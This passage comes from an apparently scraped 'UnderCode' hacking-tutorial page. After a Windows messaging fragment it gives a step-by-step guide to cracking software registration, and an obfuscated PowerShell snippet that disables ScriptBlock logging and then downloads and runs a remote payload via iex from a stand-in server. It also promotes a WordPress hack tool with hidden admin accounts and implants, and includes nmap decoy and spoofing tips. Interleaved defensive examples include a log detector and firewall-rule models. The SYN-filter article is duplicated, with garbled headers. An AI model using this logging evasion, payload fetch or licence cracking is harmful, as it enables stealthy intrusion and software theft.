message, sMsg.wParam, sMsg.lParam);
}
}
return 0;
}
7) Can everyone understand how to play this game? Run the window program wnd ("routine 1") first, then run the console program msg. msg finds wnd's window and sends it its own main thread ID. After receiving that message, wnd displays the ID. At this point wnd and msg have established communication channels in both directions: wnd can send messages to msg's main thread, and msg can send messages to wnd's window.
8) If we press the key '1' in the wnd window, wnd sends message 1 to msg. On receiving it, msg fetches wnd's window name with a WM_GETTEXT message and displays it. If we press the key '2' in the wnd window, wnd sends message 2 to msg. On receiving it, msg changes wnd's window name with a WM_SETTEXT message.
9) This small example demonstrates the message loop of a console program, sending messages to threads, and exchanging messages between processes.
10) The problem of address space
Different processes have independent address spaces. Suppose we put an address belonging to process A into the message parameters and send the message to process B. If process B dereferences that address in its own address space, an error occurs. So why do WM_GETTEXT and WM_SETTEXT in the above example work correctly?
This is because WM_GETTEXT and WM_SETTEXT are messages defined by Windows itself. Windows knows the meaning of their parameters and does special processing: it allocates a block of memory in the space of process B as a relay, and copies data between the buffers of process A and process B as needed. For example, in the example of Section 1.5.1, if we set a breakpoint and observe, we will find that the lParam in the WM_SETTEXT message sent by msg is not equal to the lParam in the WM_SETTEXT message received by wnd.
11) If we pass a memory address in a message defined by ourselves, the system does no special processing, so an error is certain to occur.
Windows provides the WM_COPYDATA message for passing data to a window, and Windows also does special processing for this message.
12) When sending messages between processes that require additional memory allocation, we should use SendMessage instead of PostMessage. SendMessage waits for the receiver to finish processing before returning, so the system has the opportunity to release the allocated memory. If PostMessage is used in this case, the system will ignore the message that needs to be delivered. The reader can experiment with this in the msg program.
Subclassing and superclassing
A window class is a template for a window, and a window is an instance of a window class. Window class and
temporarily)
WRITTEN BY UNDERCODE

How to crack a software registration code, full tutorial by UnderCode:
twitter.com/undercodeNews
LET'S START:
For those who have never been exposed to software cracking or programming.
> Let's start today's crack.
> The software I want to crack: the network form terminator. The tools needed:
1) shell detector: language.exe
2) unpacker: AspackDie.exe
3) disassembler: W32Dasm gold version
4) hex editor: UltraEdit.rar
Review the basics before cracking:
I. Cracking levels
> Beginner: modify the program, that is, edit the exe file with UltraEdit; this is called brute-force cracking, "blasting" for short
> Intermediate: trace the software's registration code
> Advanced: write a registration machine (keygen)
General steps for cracking with W32Dasm:
1) Read the software manual: what is the difference between the registered and unregistered versions, and how is it registered?
2) Run the software, try to register with your name and an arbitrary registration code, and write down the error messages that appear.
3) Detect whether the program is packed (shelled).
4) Disassemble it with pw32dasmgold.
5) Find the error message or the correct message in the string references (right mouse button).
6) Analyze the corresponding assembly in the pw32dasmgold main window to identify the key jump and the key call.
7) Stop on the key jump (green cursor bar) and read its offset address (the actual modification address) at the bottom of the pw32dasmgold main window.
8) Use UltraEdit to find that offset address (the actual modification address), modify the machine code and save.
The concept of the shell: copyright information needs protection and the author does not want others to change it, so the exe executable file is compressed. The most common shell (packer) software: ASPACK, UPX, PEcompact.
> Unpacking: given a piece of software, detect its shell, then unpack it to restore its original appearance. If it is not packed, unpacking is not necessary. Unpacking software: unaspack, caspr, upx, unpecompact, procdump.
> Actual modification address (offset address) versus row address (virtual address): the disassembly output of pw32dasmgold consists of three columns:
> the first column is the row address (virtual address)
> the second column is the machine code (this is what is finally modified in UltraEdit)
> the third column is the assembly instruction
1) Example listing (first column, second column, third column):
: 0041BE38 2B45F0 sub eax, dword ptr [ebp-10]
: 0041BE3B 6A42 push 00000042
: 0041BE3D 50 push eax
: 0041BE3E FF75F4 push [ebp-0C]
: 0041BE41 FF75F0 push [ebp-10]
: 0041BE44 FF35A8AB4400 push dword ptr [0044ABA8]
2) Two different modification methods for two different situations:
a) Modify to jmp
je (jne, jz, jnz) => jmp; corresponding machine code EB (applied to the first jump found going upward from the error message). jmp's role is to jump absolutely and unconditionally, so as to skip the error message below it.
b) Modify to nop
je (jne, jz, jnz) => nop; corresponding machine code 90 (applied to the first jump found going upward from the correct message). nop's role is to erase this jump: it makes the jump invalid and lose its function, so that the program falls through to the correct message immediately following it.
Alright, let's start our cracking journey...
1) Detect the shell: first open the shell detector language.exe, select Open, find the network form-filling terminator to be cracked, FormGhost.exe, and click OK (Figure 1). language.exe shows that the software's shell is Aspack.
2) Unpack: double-click the unpacker AspackDie.exe; a dialog box appears; select the network form-filling terminator FormGhost.exe and open it.
3) The network form terminator FormGhost.exe then produces an unpacked.exe file in the same directory. This is the unpacked FormGhost.exe.
4) Start disassembling: open the disassembler W32Dasm Gold (the official version is the Chinese version), select Disassembler - Open, choose the unpacked.exe produced by unpacking, and let it load.
5) Start modifying the software: open the hexadecimal editor UltraEdit.
> (UltraEdit.rar is a bit slow.)
> Open the unpacked.exe produced by unpacking and press Ctrl+G; a dialog box appears; enter 0xacb4b (that is, the offset address, without the leading 000).
6) Close all the software, run the saved unpacked222.exe, click Help --- Registration, enter any registration name and registration code, click OK, and it prompts that registration is complete (Figure 21). Go back to the software interface and look at Help: the registration item has been grayed out.
The cracking is all completed.
WRITTEN BY UNDERCODE

PowerShell ScriptBlock Log Bypass by UnderCode:
twitter.com/undercodeNews
LET'S START:
1) As with any logging feature, ScriptBlock logging is controlled by Group Policy settings. PowerShell consults them whenever it encounters a new ScriptBlock, to decide whether it must be logged. In fact, PowerShell performs the lookup once, caches the result in memory, and returns the cached value on every later access.
2) Thus these parameters can easily be changed with the following code.
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] =
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
3) These actions can be performed without administrator privileges and without touching the registry, which keeps them discreet. But there is one limitation.
4) The new settings only take effect after the cached parameters are next checked, which happens when the first ScriptBlock finishes executing, and so that first ScriptBlock is still logged. Therefore this trigger ScriptBlock should be as obfuscated as possible and should carry no payload; it is executed solely to switch logging off.
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }
    $val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
    $val.Add('EnableScriptB'+'lockLogging', 0)
    $val.Add('EnableScriptB'+'lockInvocationLogging', 0)
    $GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val
}
iex (New-Object Net.WebClient).downloadstring("https://server/payload.ps1")
5) The script above runs the trigger, overwrites the cached logging settings, and then launches the payload without it being logged.
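Added example, not part of the UnderCode post: a defender-side check, in Python, that scans the ScriptBlockText of PowerShell script block log events (Event ID 4104) for the indicators of this technique. Point 4 above concedes that the trigger block itself is still logged, so that first 4104 event is where a detection has to fire. The check first folds the two cheap obfuscations the trigger relies on, literal concatenation such as 'ScriptB'+'lockLogging' and backticks inside quoted method names such as "GetFie`ld", and then looks for the names the tampering must reference (cachedGroupPolicySettings, System.Management.Automation.Utils, the EnableScriptBlock* keys, the policy registry path). The sample events are constructed inline; ScriptBlockText is the real field name of 4104 events, everything else (function names, scoring fields) is this example's own.

```python
import re

# Names the tampering must reference, whatever the obfuscation (all taken from the technique above).
INDICATORS = (
    "cachedgrouppolicysettings",
    "system.management.automation.utils",
    "enablescriptblocklogging",
    "enablescriptblockinvocationlogging",
    r"policies\microsoft\windows\powershell\scriptblocklogging",
)

# 'abc'+'def'  ->  'abcdef'   (one pair at a time; normalize() repeats until nothing changes)
_CONCAT = re.compile(r"""(['"])((?:(?!\1).)*)\1\s*\+\s*(['"])((?:(?!\3).)*)\3""")
# ."GetFie`ld"(   ->   ."GetField"(
_TICK_METHOD = re.compile(r'"([A-Za-z`]+)"\s*\(')


def normalize(script):
    """Undo the two cheap obfuscations used by the trigger block (literal concatenation and
    backtick-split method names), yielding the text the script actually evaluates to."""
    s = script
    while True:
        folded = _CONCAT.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", s, count=1)
        if folded == s:
            break
        s = folded
    return _TICK_METHOD.sub(lambda m: '"' + m.group(1).replace("`", "") + '"(', s)


def analyze(script_text):
    """Score one ScriptBlockText value; 'suspicious' is set when a tampering indicator is present."""
    norm = normalize(script_text).lower()
    hits = [name for name in INDICATORS if name in norm]
    concat_joins = len(re.findall(r"""['"]\s*\+\s*['"]""", script_text))
    split_names = [m.group(1) for m in _TICK_METHOD.finditer(script_text) if "`" in m.group(1)]
    return {
        "indicators": hits,
        "concat_joins": concat_joins,       # how many literal concatenations were folded
        "split_method_names": split_names,  # method names that needed backtick removal
        "suspicious": bool(hits),
    }


# Constructed sample events in the shape of 4104 EventData (ScriptBlockText is the real field name).
SAMPLE_EVENTS = [
    {"id": 1, "ScriptBlockText": r"Get-ChildItem C:\Users | Where-Object { $_.Name -like 'adm*' }"},
    {"id": 2, "ScriptBlockText": r"""$f = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static'); $c = $f.GetValue($null); $c['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0"""},
    {"id": 3, "ScriptBlockText": "Write-Output ('Hello, '+'world')"},
]


def scan(events):
    """Return the ids of events whose script block carries a tampering indicator."""
    return [e["id"] for e in events if analyze(e["ScriptBlockText"])["suspicious"]]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["id"], analyze(event["ScriptBlockText"]))
    print("flagged:", scan(SAMPLE_EVENTS))
```

Event 3 shows why the normalization matters in both directions: string concatenation on its own is ordinary PowerShell and is not flagged, while the folded text of event 2 exposes the settings cache names regardless of how the literals were split. In a real pipeline the same analyze() would be run over ScriptBlockText pulled from the Microsoft-Windows-PowerShell/Operational log.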
WRITTEN BY UNDERCODE

You can upload these scripts to a git repo and start some helpful script with a few customizations.

Lalin: this script automatically installs any package for pentesting, with up-to-date tools, and provides lazy commands for running tools, like lazynmap; it can install more and update to new versions. It's actually for lazy people, hahaha. Lalin is a remake of lazykali with fixed bugs, added features and up-to-date tools. It's compatible with the latest release of Kali.
pinterest.com/undercodeOfficial
LET'S START:
1) git clone https://github.com/Screetsec/LALIN
2) cd LALIN
3) sudo chmod +x Lalin.sh
4) sudo ./Lalin.sh
Tested by UnderCode
> Kali, on the GNOME desktop

Updated 2020: generate and search pattern strings for exploit development
twitter.com/unDERCODENews
LET'S START:
1) git clone https://github.com/Svenito/exploit-pattern
2) cd exploit-pattern
3) Generate a pattern:
$> pattern.py 100
Aa0Aa0Aa1Aa1Aa2Aa2Aa3Aa3Aa4Aa4Aa5Aa5Aa6Aa6Aa7Aa7Aa8Aa8Aa9Aa9Ab0Ab0Ab1Ab1Ab2Ab2Ab3Ab3Ab4Ab4Ab5Ab5Ab6A
4) Search for a pattern:
$> pattern.py Bf4B
Pattern Bf4B first occurrence at position 942 in pattern.
5) Search for a value read from a register (interpreted as a little-endian dword):
$> pattern.py 0x42346642
Pattern 0x42346642 first occurrence at position 942 in pattern.
6) Use it in your own Python code. After placing pattern.py in the same directory as your script:
from pattern import pattern_gen
print(pattern_gen(10))
or
from pattern import pattern_search
found_at = pattern_search('Bf4B')
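Added example (not the exploit-pattern project's own code): a stand-alone Python reimplementation of the two functions the post imports, pattern_gen and pattern_search, so that the position 942 reported above can be checked by hand. It assumes the standard Aa0Aa1Aa2... layout (uppercase, lowercase, digit, with the digit cycling fastest), which is the layout under which 'Bf4B' sits at offset 942; a 0x-prefixed argument is interpreted as a little-endian register value, since 0x42346642 read little-endian is the bytes 'Bf4B'. Function names match the post; MAX_PATTERN and the width handling are this example's own.

```python
import string

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
# Every 3-byte triple (upper, lower, digit) is distinct, so the pattern stays unique for
# 26 * 26 * 10 * 3 = 20280 bytes before it would have to repeat.
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGITS) * 3


def pattern_gen(length):
    """Return the first `length` characters of the cyclic pattern Aa0Aa1Aa2...Zz9."""
    if not 0 <= length <= MAX_PATTERN:
        raise ValueError(f"length must be between 0 and {MAX_PATTERN}")
    triples = []
    for up in UPPER:
        for lo in LOWER:
            for dg in DIGITS:
                triples.append(up + lo + dg)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    return "".join(triples)[:length]


def pattern_search(needle):
    """Offset of `needle` in the pattern. A 0x-prefixed value is taken to be a register
    dump and is converted to bytes little-endian, so 0x42346642 becomes 'Bf4B'."""
    if needle.lower().startswith("0x"):
        value = int(needle, 16)
        width = 8 if value.bit_length() > 32 else 4   # 32- or 64-bit register
        needle = value.to_bytes(width, "little").rstrip(b"\x00").decode("ascii")
    position = pattern_gen(MAX_PATTERN).find(needle)
    if position == -1:
        raise ValueError(f"{needle!r} does not occur in the pattern")
    return position


if __name__ == "__main__":
    print(pattern_gen(100))
    for query in ("Bf4B", "0x42346642"):
        print(f"Pattern {query} first occurrence at position {pattern_search(query)} in pattern.")
```

The arithmetic behind 942: 'Bf4' is triple number 1*260 + 5*10 + 4 = 314, and each triple is three bytes, so it starts at byte 942; the following triple 'Bf5' supplies the trailing 'B'. A needle that decodes to non-ASCII bytes raises ValueError from decode(), which is the right outcome for a register that did not come from the pattern.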
@underCodeTesting

New 2020 WordPress hack script for Linux/Termux:
T.me/UnderCodeTesting
> Features:
1) Bypass WAF (web application firewall)
2) Hidden/stealth
3) Lets you log in as any user
4) Dump all user entries
5) Create a persistent, hidden admin account
6) Obfuscated implant
7) Multi-functionality
INSTALLATION & RUN:
1) git clone https://github.com/shadowlabscc/ProjectOpal.git
2) cd ProjectOpal
3) python opal.py
@underCodeOfficial

2020 popular Instagram sites with trials, no password required:
These are the most popular, but not tested by UnderCode:
fb.com/underCodeTesting
> https://famoid.com/buy-instagram-followers/
> https://www.followerpackages.com/buy-instagram-followers/
> https://www.genuinelikes.com/buy-instagram-followers.php
> https://www.getrealboost.com/buy-real-instagram-followers/
> https://krootez.com/buy-real-instagram-followers/
> https://buyiglikesfast.com/
> https://cheapigfollowers.com/
> https://friendlylikes.com/
> https://brsm.io/buy-real-active-instagram-followers/
There are also 100,000 sites, but we chose the most popular services.
If a site's trial is not available, try again after a few hours :)

Enhance network security with SYN packet characteristics, by UnderCode:
twitter.com/UnderCodeNews
LET'S START:
1) Consider the following situation: the internal network is 198.199.1.0, and a Linux box is used as router and firewall to connect to the Internet. On the firewall, eth0 is connected to the external network and eth1 to the internal network.
2) For the security of the www service, the following set of ipchains rules is configured:
ipchains -A input -p tcp -s 198.199.1.0/24 1024: -d 0.0.0.0/0 www -i eth1 -j ACCEPT
3) ipchains -A input -p tcp -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT
4) With the above settings, internal users are only allowed to access www hosts on the Internet from ports above 1024 (unprivileged ports); in other words, a port greater than 1024 on an intranet host may establish a connection with port 80 on an Internet host. But notice that this equally allows a host on the Internet to use its port 80 to connect to a port greater than 1024 on your intranet host. So the system has a security risk, because many services listen on ports greater than 1024. How can we overcome this hidden danger? We can use the characteristics of the SYN packet to eliminate it.
5) First let's look at the flag bits in the TCP segment header. TCP has six flags: URG, ACK, PSH, RST, SYN, and FIN. Let's focus on the ACK, SYN and FIN flags.
6) ACK: indicates whether the acknowledgment number is valid; 1 means valid, 0 means the acknowledgment number is invalid. The acknowledgment number refers to the next byte expected to be received, not the byte previously received. It follows that in the packet that initiates a connection request (that is, the first packet) ACK is always 0, and in all subsequent packets it is always 1.
7) SYN: used to establish a connection. In the connection request SYN = 1, and in the connection request confirmation SYN = 1 as well. So SYN stands for CONNECTION REQUEST and CONNECTION ACCEPTED. In all subsequent TCP packets, SYN is always 0.
FIN: used to close the connection.
8) The above can be summarized in the following table:
ACK flag   SYN flag   meaning of the TCP packet
0          1          connection request
1          1          connection request confirmation (accept connection request)
1          0          acknowledgment of the connection request confirmation
1          0          data packet
...        ...        ...
9) What we call a SYN packet is a connection request packet. As shown above, a SYN packet has the following characteristics: SYN = 1, ACK = 0, FIN = 0. Therefore, to filter connection request packets, it is only necessary to filter SYN packets.
10) In ipchains, we can specify SYN packets like this:
-p tcp -s x.x.x.x/x -y
For example, all SYN packets from 192.168.1.0 can be specified like this:
-p tcp -s 192.168.1.0/24 -y
We can also prefix -y with ! to specify all non-SYN packets:
-p tcp -s x.x.x.x/x ! -y
So, in the above example, we can enhance the security of the network like this:
ipchains -A input -p tcp -s 198.199.1.0/24 1024: -d 0.0.0.0/0 www -i eth1 -j ACCEPT
ipchains -A input -p tcp ! -y -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT
This prevents hosts on the Internet from using port 80 to open connections to ports greater than 1024 on your intranet hosts, thereby enhancing network security.
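Added example, not from the UnderCode post: the same inbound rule expressed in Python, as a model for reasoning about what the ! -y test changes. It parses the flags out of a raw TCP header, classifies the segment with the ACK/SYN/FIN table above, applies the ipchains definition of a SYN packet (SYN set, ACK and FIN clear), and evaluates the eth0 rule both without and with the SYN check. The TCP headers are constructed inline (a web server's reply, a data segment, and a probe that arrives from source port 80 aimed at port 8080); the interface name and the assumption that anything the rule does not accept falls through to a DENY default policy are this example's own.

```python
import struct

# TCP flag bits, low byte of the 16-bit offset/flags field (RFC 793 order).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def build_tcp_header(src_port, dst_port, flags):
    """Construct a minimal 20-byte TCP header (constructed sample input, not a capture)."""
    return struct.pack("!HHIIHHHH", src_port, dst_port, 0, 0, (5 << 12) | flags, 8192, 0, 0)


def parse_tcp_header(raw):
    """Return (src_port, dst_port, flags) from the fixed part of a TCP header."""
    if len(raw) < 20:
        raise ValueError("truncated TCP header")
    src, dst, _seq, _ack, off_flags = struct.unpack("!HHIIH", raw[:14])
    return src, dst, off_flags & 0x3F  # keep the six classic flags; drop the ECN bits


def classify(flags):
    """Name the segment according to the ACK/SYN/FIN table in the post."""
    if flags & RST:
        return "reset"
    if flags & FIN:
        return "connection teardown"
    if flags & SYN and not flags & ACK:
        return "connection request"
    if flags & SYN and flags & ACK:
        return "connection request confirmation"
    if flags & ACK:
        return "established segment (handshake ACK or data)"
    return "unexpected flag combination"


def is_syn_packet(flags):
    """ipchains -y: SYN set with ACK and FIN clear, i.e. a connection request."""
    return bool(flags & SYN) and not flags & ACK and not flags & FIN


def inbound_www_rule(raw, iface, syn_check):
    """Evaluate the eth0 rule from the post: accept tcp from source port 80 (www) to an
    intranet port >= 1024; with syn_check=True the '! -y' test is applied as well.
    Anything the rule does not accept is treated as denied by the chain's default
    policy (an assumption of this example)."""
    src, dst, flags = parse_tcp_header(raw)
    if iface != "eth0":
        return "DENY"
    if src != 80 or dst < 1024:
        return "DENY"
    if syn_check and is_syn_packet(flags):
        return "DENY"  # an Internet host opening a connection from its own port 80
    return "ACCEPT"


# Constructed traffic: a legitimate reply from a web server, a data segment of the same
# connection, and a probe that uses source port 80 to reach a service on intranet port 8080.
SERVER_REPLY = build_tcp_header(80, 40000, SYN | ACK)
SERVER_DATA = build_tcp_header(80, 40000, ACK | PSH)
PORT80_PROBE = build_tcp_header(80, 8080, SYN)


def compare_rules():
    """Decision of the original and the hardened rule for each constructed packet."""
    return {
        name: (inbound_www_rule(pkt, "eth0", False), inbound_www_rule(pkt, "eth0", True))
        for name, pkt in (("server_reply", SERVER_REPLY),
                          ("server_data", SERVER_DATA),
                          ("port80_probe", PORT80_PROBE))
    }


if __name__ == "__main__":
    for name, (before, after) in compare_rules().items():
        print(f"{name:13s} original={before:6s} with-syn-check={after}")
```

The only packet whose verdict changes is the probe: the server's SYN/ACK and its data segments are not SYN packets in the -y sense, so legitimate replies still pass, while an unsolicited connection request from port 80 is dropped. The same test survives in later Linux firewalls as the iptables tcp match option --syn (SYN set, ACK, RST and FIN clear).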
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Enhance network security with SYN packet characteristics BY uNDERcODE :
twitter.com/UnderCodeNews
π¦ ππΌππ πππΈβπ :
1) Consider the following situation: the
internal network is 198.199.1.0, and Linux is used as a router and firewall to connect to the Internet. On the firewall, eth0 is connected to the external network and eth1 is connected to the internal network.
2) For the security of the www service, set the following set of ipchains rules:
ipchains -A input -p tcp -s 198.199.1.0/24: 1024 -d 0.0.0.0/0 www -i eth1 -j ACCEPT
3) ipchains -A input -p tcp -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT
4) In the above settings, only internal users are allowed to access www hosts on the Internet with ports above 1024 (undefined ports) In other words, allow a port greater than 1024 on the intranet host and port 80 on the Internet to establish a connection. Imagine that this would allow hosts on the Internet to use port 80 to connect to a port on your intranet host that is greater than 1024. From this we can see that the system has security risks because there are many services with service ports greater than 1024. So, how to overcome this hidden danger, we can use the characteristics of the SYN packet to eliminate this hidden danger.
5) First let's take a look at the flag bits in the TCP data segment header. TCP has six flags, which are: URG, ACK, PSH, RST, SYN, and FIN. Let's focus on the ACK, SYN and FIN flags.
6) ACK: indicates whether the confirmation number is legal, 1 indicates legality, 0 indicates that the confirmation number is invalid. The acknowledgment number refers to the next byte that is expected to be received instead of the previously received byte. It can be seen that the ACK of the packet that initiates the connection establishment request (that is, the first guarantee) is always set to 0, and the subsequent packets are always set to 1.
7) SYN: used to establish a connection. In the connection request, SYN = 1, and in the connection request confirmation, SYN = 1. Therefore, SYN stands for CONNECTION REQUEST and CONNECTION ACCEPTED. In subsequent TCP packets, SYN is always set to zero.
FIN: Used to cancel the connection.
8) The above can be summarized with the following table:
ACK flag SYN flag meaning of the TCP packet
0 1 connection request
1 1 connection request confirmation (accept connection request)
1 0 confirmation connection request confirmation
1 0 data packet
... ...
9) What we call a SYN packet is a connection request packet. As shown above, the SYN packet has the following characteristics: SYN = 1, ACK = 0, FIN = 0. Therefore, in order to filter connection request packets, it is only necessary to filter out SYN packets.
10) In ipchains, we can specify SYN packets like this:
-p tcp -s xxxx / x -y
If we can define all SYN packets from 192.168.1.0 like this:
-p tcp -s 192.168.1.0/24 -y
we can also Prefix -y with! To define all non-SYN packets:
-P tcp -s xxxx / x! -Y
So, in the above example, we can strengthen the network like this:
ipchains -A input -p tcp -s 198.199.1.0/24 1024: -d 0.0.0.0/0 www -i eth1 -j ACCEPT
ipchains -A input -p tcp ! -y -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT
The second rule accepts only non-SYN packets, so a host on the Internet can no longer use its port 80 to open a connection to a port greater than 1024 on an intranet host, while replies to connections the intranet initiated still pass. This achieves the purpose of enhancing network security.
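Added here as a worked example (not from the original article): a small Python model of the SYN-packet rule. It decodes the flags from a raw TCP header, classifies the segment according to the table, and walks the two ipchains rules for three constructed packets, showing that the `! -y` test drops the inbound connection request from Internet port 80 while still accepting the SYN/ACK reply to a connection the intranet opened. The interface roles (eth1 intranet, eth0 Internet), the DENY default policy and the sample addresses are assumptions.

```python
import struct
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# TCP flag bits in the low byte of the header's data-offset/flags word
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Topology assumed for the rules above: eth1 faces the intranet 198.199.1.0/24,
# eth0 faces the Internet, and the default policy of the input chain is DENY.
INTRANET = ip_network("198.199.1.0/24")
WWW = 80


@dataclass
class TcpSegment:
    src: str
    dst: str
    sport: int
    dport: int
    flags: int


def parse_tcp(src: str, dst: str, segment: bytes) -> TcpSegment:
    """Decode ports and flag bits from the fixed 20-byte TCP header (RFC 793)."""
    sport, dport, _seq, _ack, off_flags = struct.unpack("!HHIIH", segment[:14])
    return TcpSegment(src, dst, sport, dport, off_flags & 0x3F)


def classify(seg: TcpSegment) -> str:
    """Name the handshake role of a segment from its ACK/SYN bits (the table above)."""
    syn, ack = bool(seg.flags & SYN), bool(seg.flags & ACK)
    if syn and not ack:
        return "connection request"
    if syn and ack:
        return "connection request confirmation"
    if ack:
        return "acknowledgment or data packet"
    return "other"


def is_syn_packet(seg: TcpSegment) -> bool:
    """What ipchains -y matches: SYN=1 with ACK=0 and FIN=0."""
    return bool(seg.flags & SYN) and not (seg.flags & (ACK | FIN))


def rule_outbound(seg: TcpSegment) -> bool:
    """-A input -p tcp -s 198.199.1.0/24 1024: -d 0.0.0.0/0 www -i eth1 -j ACCEPT"""
    return ip_address(seg.src) in INTRANET and seg.sport >= 1024 and seg.dport == WWW


def rule_inbound_weak(seg: TcpSegment) -> bool:
    """The inbound rule from the earlier setting, without the ! -y test."""
    return seg.sport == WWW and ip_address(seg.dst) in INTRANET and seg.dport >= 1024


def rule_inbound(seg: TcpSegment) -> bool:
    """-A input -p tcp ! -y -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT"""
    return not is_syn_packet(seg) and rule_inbound_weak(seg)


def accepted(seg: TcpSegment, iface: str, hardened: bool = True) -> bool:
    """Walk the input chain for a packet arriving on iface; DENY if no rule matches."""
    if iface == "eth1":
        return rule_outbound(seg)
    if iface == "eth0":
        return rule_inbound(seg) if hardened else rule_inbound_weak(seg)
    return False


def tcp_header(sport: int, dport: int, flags: int) -> bytes:
    """Constructed test input: a 20-byte TCP header (data offset 5) with the given flags."""
    return struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags, 8192, 0, 0)


# Constructed scenarios: a legitimate web request from the intranet, the server's
# reply, and an Internet host using source port 80 to open a connection inward.
SCENARIOS = {
    "client SYN out":   ("eth1", parse_tcp("198.199.1.10", "203.0.113.5", tcp_header(40000, WWW, SYN))),
    "server SYN/ACK":   ("eth0", parse_tcp("203.0.113.5", "198.199.1.10", tcp_header(WWW, 40000, SYN | ACK))),
    "inbound from :80": ("eth0", parse_tcp("203.0.113.5", "198.199.1.10", tcp_header(WWW, 6000, SYN))),
}


def evaluate() -> dict:
    """For each scenario: its handshake role, the verdict of the weak rules, the verdict of the hardened rules."""
    return {
        name: (classify(seg), accepted(seg, iface, hardened=False), accepted(seg, iface))
        for name, (iface, seg) in SCENARIOS.items()
    }


if __name__ == "__main__":
    for name, (role, weak, hardened) in evaluate().items():
        print(f"{name:18s} {role:32s} weak={weak!s:5s} hardened={hardened}")
```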
WRITTEN BY UNDERCODE
Full UnderCode Tutorial: Nmap Network Security Scanner Instructions
PART 1
-i
Read target specifications from the given file instead of the command line. The file may hold a list of hosts or networks separated by spaces, tabs or newlines. To read from standard input (for example, at the end of a pipe), use a hyphen (-) as the file name. See the target description section for the syntax of the entries.
-p
Specifies the ports you want to scan. For example, '-p 23' probes only port 23 of the target host. By default nmap scans ports 1 to 1024 as well as the ports listed in the services file that comes with nmap.
-F Fast scan mode. Scan only the ports listed in the services file that comes with nmap. This is obviously much faster than scanning all 65535 ports.
-D
Decoy scan. All the decoy addresses you specify will appear in the remote host's connection logs: the logs will show port scans launched from several IPs, but the host cannot tell which one is real and which are cover. This defeats some forms of tracing by route, so it is a practical technique for hiding your IP. Separate the decoy addresses with commas. You can put 'ME' wherever you want your real IP to appear in the order; if you put 'ME' in the sixth position or later, some port scan loggers (such as Solar Designer's excellent scanlogd) may not show your IP at all, and if you don't use 'ME' at all, nmap puts it in a random position. Remember that the hosts you use as decoys should be up; otherwise you may end up flooding your target with half-open connections, and it is fairly easy to tell which address is the real intruder when the others are not actually on the network. You may also want to use IP addresses instead of names, so that the decoys' nameserver logs do not record you. Also remember that some (stupid) "port scan detectors" will firewall off any host that attempts a port scan; in that case you would inadvertently cut off connectivity between the host you scanned and the decoy hosts, which could be a big problem if a decoy is its Internet gateway or even its own local machine! So use this parameter carefully, for moral reasons as well: it is only a deception, isn't it? Decoys are used both in the initial ping scan (using ICMP, SYN, ACK or whatever) and in the actual port state scan, and also in remote OS detection (-O). Of course, listing too many decoys is pointless; it only slows the scan down and may reduce accuracy. And some ISPs may filter out your spoofed packets, although most (almost all) place no restriction on spoofed packets.
-S
Under certain circumstances nmap may not be able to determine your source address (nmap will tell you if this is the case). In that situation use -S with your IP address. Another possible use of this option is to make the target think that someone else is scanning it. Imagine a company being constantly port scanned by a competitor :). This is an unsupported usage, or rather not the main purpose; I mention it only to remind people not to point fingers when they see a port scan: the apparent source may be innocent. -e is generally required for this sort of usage.
-e
Tells nmap which interface to send and receive packets on. nmap should be able to detect this automatically; it will tell you if it cannot.
PART 2 NMAP FULL
-g
Sets the source port number used in the scan. Many "naive" firewalls and packet filters have rules that let DNS (53) or FTP-DATA (20) packets come in and establish a connection, while everything else is filtered. Obviously this is a thoughtless approach, because an intruder can simply set the source port to look like FTP or DNS. Note that this is only a request: for example, TCP ISN sampling cannot all be done from one host:port, so even with -g nmap will change the source port and try again. Also be aware that there can be a small delay when using this option, because I sometimes store useful information in the source port number.
-M
Sets the maximum number of sockets used in parallel for a TCP connect() scan (the default scan type). This is useful for slowing the scan down a little, to avoid crashing remote hosts. Another way is to use -sS.
Timing options
--------------
Although nmap generally does a good job of completing the scan as quickly as the network allows at run time, there are occasionally hosts/ports that go undetected. This may be because nmap's default timing policy does not match your target (the equivalent of a timeout setting). The following options control the timing of a scan:
-T
